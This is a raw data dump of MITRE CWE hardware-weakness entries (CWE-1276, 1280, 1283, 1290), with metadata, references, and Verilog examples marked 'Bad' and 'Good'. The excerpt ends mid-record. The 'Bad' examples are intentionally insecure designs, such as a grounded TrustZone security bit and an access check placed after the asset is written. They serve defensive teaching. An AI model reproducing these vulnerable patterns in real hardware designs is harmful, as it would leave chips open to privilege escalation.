] | null | null | null | null |
[
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1362",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "ariane.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/b9ecdf6068445d76d6bee692d163fededf7a9d9b/piton/design/chip/tile/ariane/src/ariane.sv#L539:L540",
"URLDate": "2023-07-15"
},
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1363",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2021",
"Publisher": null,
"Section": null,
"Title": "Fix CWE-1276",
"URL": "https://github.com/HACK-EVENT/hackatdac21/blob/9a796ee83e21f59476d4b0a68ec3d8e8d5148214/piton/design/chip/tile/ariane/src/ariane.sv#L539:L540",
"URLDate": "2023-09-01"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-22",
"SubmissionName": "Nicole Fern",
"SubmissionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, References",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Chen Chen, Rahul Kande, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Hardware Block Incorrectly Connected to Larger System",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "// IP definition\n module tz_peripheral(clk, reset, data_in, data_in_security_level, ...);\n\n```\n\t input clk, reset;\n\t input [31:0] data_in;\n\t input data_in_security_level;\n\t ...\n endmodule\n // Instantiation of IP in a parent system\n module soc(...)\n\t ...\n\t tz_peripheral u_tz_peripheral(\n\t\t .clk(clk),\n\t\t .rst(rst),\n\t\t .data_in(rdata),\n\t\t //Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to \"secure\")\n\t\t .data_in_security_level(1'b0),\n\t );\n\t ...\n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "// Instantiation of IP in a parent system\n module soc(...)\n\n```\n\t ...\n\t tz_peripheral u_tz_peripheral(\n\t\t .clk(clk),\n\t\t .rst(rst),\n\t\t .data_in(rdata),\n\t\t // This port is no longer grounded, but instead driven by the appropriate signal\n\t\t .data_in_security_level(rdata_security_level),\n\t );\n\t ...\n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Here is a code snippet from the Ariane core module in the HACK@DAC'21 Openpiton SoC [REF-1362]. To ensure full functional correctness, developers connect the ports with names. However, in some cases developers forget to connect some of these ports to the desired signals in the parent module. These mistakes by developers can lead to incorrect functional behavior or, in some cases, introduce security vulnerabilities.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n csr_regfile #(\n\n```\n\t ...\n ) csr_regfile_i (\n\t .flush_o ( flush_csr_ctrl ),\n\t .halt_csr_o ( halt_csr_ctrl ),\n\t ...\n```\n.irq_i(),** \n\t\n\t **.time_irq_i(),** \n\t .*\n\t );\n ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In the above example from HACK@DAC'21, since interrupt signals are not properly connected, the CSR module will fail to send notifications in the event of interrupts. Consequently, critical information in CSR registers that should be flushed or modified in response to an interrupt won't be updated. These vulnerabilities can potentially result in information leakage across various privilege levels.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To address the aforementioned vulnerability, developers must follow a two-step approach. First, they should ensure that all module signals are properly connected. This can often be facilitated using automated tools, and many simulators and sanitizer tools issue warnings when a signal remains unconnected or floats. Second, it is imperative to validate that the signals connected to a module align with the specifications. In the provided example, the developer should establish the correct connection of interrupt signals from the parent module (Ariane core) to the child module (csr_regfile) [REF-1363].",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "...\n csr_regfile #(\n\n```\n\t ...\n ) csr_regfile_i (\n\t .flush_o ( flush_csr_ctrl ),\n\t .halt_csr_o ( halt_csr_ctrl ),\n\t ...\n```\n.irq_i (irq_i),** \n\t\n\t **.time_irq_i (time_irq_i),** \n\t .*\n\t );\n ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1276"
]
] |
[] |
1280
|
Access Control Check Implemented After Asset is Accessed
|
Base
|
Simple
|
Incomplete
|
A product's hardware-based access control check occurs after the asset has been accessed.
|
The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be compromised.
|
[
{
"Class": null,
"Name": "Verilog",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "VHDL",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Modify Application Data",
"Read Application Data",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control",
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Implement the access control check first. Access should only be given to asset if agent is authorized.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"180"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-12",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "696",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "module foo_bar(data_out, usr_id, data_in, clk, rst_n);\n output reg [7:0] data_out;\n input wire [2:0] usr_id;\n input wire [7:0] data_in; \n input wire clk, rst_n;\n wire grant_access;\n always @ (posedge clk or negedge rst_n)\n begin\n\n```\n\t if (!rst_n)\n\t\t data_out = 0; \n\t else \n\t\t data_out = (grant_access) ? data_in : data_out;\n\t\t assign grant_access = (usr_id == 3'h4) ? 1'b1 : 1'b0;\n end\n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "This code uses Verilog blocking assignments for data_out and grant_access. Therefore, these assignments happen sequentially (i.e., data_out is updated to new value first, and grant_access is updated the next cycle) and not in parallel. Therefore, the asset data_out is allowed to be modified even before the access control check is complete and grant_access signal is set. Since grant_access does not have a reset value, it will be meta-stable and will randomly go to either 0 or 1.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Flipping the order of the assignment of data_out and grant_access should solve the problem. The correct snippet of code is shown below.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "always @ (posedge clk or negedge rst_n)\n begin\n\n```\n\t if (!rst_n)\n\t\t data_out = 0;\n\t else\n\t\t assign grant_access = (usr_id == 3'h4) ? 1'b1 : 1'b0;\n\t\t data_out = (grant_access) ? data_in : data_out;\n end\n endmodule\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": "DX-187"
}
] | null | null | null | null | 2
|
[
[
"691",
"696",
"1280"
],
[
"284",
"1280"
]
] |
[] |
1283
|
Mutable Attestation or Measurement Reporting Data
|
Base
|
Simple
|
Incomplete
|
The register contents used for attestation or measurement reporting data to verify boot flow are modifiable by an adversary.
|
A System-on-Chip (SoC) implements secure boot or verified boot. During this boot flow, the SoC often measures the code that it authenticates. The measurement is usually done by calculating the one-way hash of the code binary and extending it to the previous hash. The hashing algorithm should be a Secure One-Way hash function. The final hash, i.e., the value obtained after the completion of the boot flow, serves as the measurement data used in reporting or in attestation. The calculated hash is often stored in registers that can later be read by the party of interest to determine tampering of the boot flow. A common weakness is that the contents in these registers are modifiable by an adversary, thus spoofing the measurement.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "Such issues can be introduced during hardware architecture or design and can be identified later during Testing or System Configuration phases.",
"Phase": "Architecture and Design"
},
{
"Note": "If the access-controls which protecting the reporting registers are misconfigured during implementation, this weakness can arise.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Memory",
"Read Application Data"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "\n\nMeasurement data should be stored in registers that are read-only or otherwise have access controls that prevent modification by an untrusted agent.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null |
[
"680"
] |
[
{
"Authors": [
"Intel Corporation"
],
"Edition": null,
"ExternalReferenceID": "REF-1107",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": "09",
"PublicationYear": "2018",
"Publisher": null,
"Section": null,
"Title": "PCIe Device Measurement Requirements",
"URL": "https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf",
"URLDate": null
},
{
"Authors": [
"John Butterworth",
"Cory Kallenberg",
"Xeno Kovah"
],
"Edition": null,
"ExternalReferenceID": "REF-1131",
"Publication": null,
"PublicationDay": "31",
"PublicationMonth": "07",
"PublicationYear": "2013",
"Publisher": null,
"Section": null,
"Title": "BIOS Chronomancy: Fixing the Core Root of Trust for Measurement",
"URL": "https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf",
"URLDate": null
}
] |
[
{
"Note": "This entry is still in development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-25",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The SoC extends the hash and stores the results in registers. Without protection, an adversary can write their chosen hash values to these registers. Thus, the attacker controls the reported results.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To prevent the above scenario, the registers should have one or more of the following properties:\n\n\n - Should be Read-Only with respect to an adversary\n\n - Cannot be extended or modifiable either directly or indirectly (using a trusted agent as proxy) by an adversary\n\n - Should have appropriate access controls or protections",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1283"
]
] |
[] |
1290
|
Incorrect Decoding of Security Identifiers
|
Base
|
Simple
|
Incomplete
|
The product implements a decoding mechanism to decode certain bus-transaction signals to security identifiers. If the decoding is implemented incorrectly, then untrusted agents can now gain unauthorized access to the asset.
|
In a System-On-Chip (SoC), various integrated circuits and hardware engines generate transactions such as to access (reads/writes) assets or perform certain actions (e.g., reset, fetch, compute, etc.). Among various types of message information, a typical transaction is comprised of source identity (to identify the originator of the transaction) and a destination identity (to route the transaction to the respective entity). Sometimes the transactions are qualified with a security identifier. The security identifier helps the destination agent decide on the set of allowed actions (e.g., access an asset for read and writes). A decoder decodes the bus transactions to map security identifiers into necessary access-controls/protections.
A common weakness that can exist in this scenario is incorrect decoding because an untrusted agent's security identifier is decoded into a trusted agent's security identifier. Thus, an untrusted agent previously without access to an asset can now gain access to the asset.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Bus/Interface Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"DoS: Resource Consumption (Other)",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Quality Degradation"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "Security identifier decoders must be reviewed for design consistency and common weaknesses.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Access and programming flows must be tested in pre-silicon and post-silicon testing in order to check for this weakness.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-29",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
